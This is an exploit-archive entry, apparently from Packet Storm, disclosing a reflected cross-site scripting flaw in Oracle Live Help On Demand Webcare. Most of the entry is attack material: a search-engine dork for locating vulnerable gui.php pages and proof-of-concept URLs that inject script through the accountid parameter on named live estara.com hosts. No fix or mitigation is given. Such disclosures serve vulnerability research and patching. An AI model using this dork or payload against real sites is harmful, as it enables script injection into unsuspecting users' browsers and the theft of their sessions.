Oracle Live Help On Demand Webcare suffers from a cross site scripting vulnerability.
7e4f2111017c66130c9ae165a74c12a728cbd0c8a2ff74c16cbbac908f8ac1a3# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks:inurl:UI/gui.php
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html
..................................................................
Demo:
http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here]
http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034
or
https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25×tamp=1321973587
http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034
http://2.bp.blogspot.com/-pGRIzWM5Ll0/T03bHKCWwmI/AAAAAAAAAo8/oaLXxGtydnc/s1600/oracle.JPG
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed